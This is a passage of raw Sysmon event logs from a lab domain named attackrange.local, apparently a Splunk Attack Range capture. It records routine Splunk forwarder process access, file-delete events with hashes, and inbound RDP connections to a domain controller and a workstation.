09:10:45.315{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049945Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:45.315{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049944Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:45.315{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049943Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:45.315{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8A95-6151-2C7A-00000000FC01}6800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049942Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:45.315{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8A95-6151-2C7A-00000000FC01}6800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049941Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:45.301{5EBD8912-8A95-6151-2C7A-00000000FC01}6800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049940Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:45.000{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E2021109F902F05C01A2399D76B954F,SHA256=4C048200D0E38C1352AA47AEF59BF76A10F4D5B3BE054912FA5587DD810DECCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978629Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:46.961{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71F81CBA9E1595F5CECEB4C4053E8839,SHA256=04042D364153A21B1ECD914D6E12A1511E454A088E0932B38A860CB38F273BE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049961Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:46.985{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=418384DEFF2F5BAA8708E1BD50489885,SHA256=1C470C4A71C0EE2A41CEEEAEA577C435239C3150711C9F12C325684099C85E43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049960Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:46.036{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D23BD1D96F60C35E37079A99A851E97,SHA256=CD384522A5862E4238A64E8892ECE2E5B758D65F218AEE49997436550A062C8E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049959Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:45.999{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8A95-6151-2D7A-00000000FC01}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049958Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:45.999{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049957Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:45.999{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049956Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:45.999{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049955Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:45.999{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049954Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:45.999{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8A95-6151-2D7A-00000000FC01}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049953Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:45.999{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8A95-6151-2D7A-00000000FC01}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049952Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:45.984{5EBD8912-8A95-6151-2D7A-00000000FC01}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000978630Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:47.961{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6161324A5223D7B686D41CD39D91E92,SHA256=0AAC6FC9966C51335633C117289A69CDD1641C767E94D8C5E162986A0AE4BEB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049962Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:47.069{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E08170C8BA4830B336CC94D62B8BB13,SHA256=54D3F9E216DA586CC542178A94C1A53D2F9559E9F8B2FB3ED795D1C66B25A990,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978631Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:48.961{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4D28B4E0A9FAD5F63878685E68396AC,SHA256=53D0E8F8B195E71489E5A20CDB08B5875463EEF16A4A9625FDA5CD8ECB48F600,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049966Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:46.301{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-59925-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001049965Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:45.830{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de52320-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049964Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:48.086{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05594D14C356E3F4317D1628F5F5A652,SHA256=0377D5604479D1461FB712C102B3DC5C17AFE28876BA42C880F4E2B6CEAA17AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049963Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:48.071{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E5558D3C85E6F19B4A3EA7A99F5E8654,SHA256=D92F9BB9629A5A56C31F554D87C48A30D6D0BA0FB02092EB18C9E9743B7CCF75,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978636Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:46.730{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59373-false10.0.1.12-8000- 354300x8000000000000000978635Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:46.567{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-49785-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978634Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:49.962{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A9D6348ED477B2C312E2C6AC71D8DD0,SHA256=7EC9E4E523B2A19CBB77F2C3D3B32016491E2C9B57F58EF4C0E7374DBC542EF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049967Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:49.117{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=342B7814E839658CB8C05ACC41DFAA8B,SHA256=E593193531BC66F1297084412018CBA6CEBE4757B5125DFD73604302439F19ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978633Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:49.274{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C6C0E90D10E9F8336E54072FED8CC9EF,SHA256=1B9E431105446348FF154CDA960913B2DE7C80E890066D783A9EAD91940343B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978632Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:49.274{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0AF5897E9AE0B4FB14190A479477F7FE,SHA256=0CA3BF7D2CBE9AD3F797AB921A97EBA40209C9CD6E29A0A63D6754A3A7737F1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978637Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:50.977{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9276A9B821A9DF9922332924D0F84E75,SHA256=8DA5012B03F0310E0904F7DCA7ACEF6FFE82387CF1799FC5345AD9C41826CD3C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049969Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:48.945{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53351-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049968Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:50.134{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46DB55866711BD30CF2C992EB4372F0B,SHA256=10882E158BF2A95EE11127043CA1A66BB3B840B4B5CADCF0912084E4313B83BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978638Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:51.993{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A16CED0E812759803DAD6CAE3D10CECE,SHA256=C2B1A21845E644D1B3FD565C9CF6674AC43DBBDDC3DAB360745C23D491E799D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049971Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:51.535{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=09E7CCC774690C33F3E7FD7563AA4D56,SHA256=17EB635822FFB39B39ED966D8A6AFD79348935B3151F2E8AD27F06E19A1B29D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049970Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:51.154{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DC2132899B9E918E6AC98824F31F1B4,SHA256=042C1427039CB68AF0B8A4D98FDE324D85C30386D6EB878FE6D76424FBBCE293,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978639Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:52.993{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6774E1732E668B63877B0AA3F241BE44,SHA256=12B5192B8876F4FA3AABC8FB97323EE15C43474575A5113F14550CE739AE8FC4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049973Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:49.893{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-51892-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049972Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:52.169{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=203800C5ACA490A7105661C4021E4397,SHA256=3CCFA997E9B2FD5EE3AD0FF105DFE78724155C6F21F471B9CE93DF6F0ABFAD5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978640Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:53.993{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 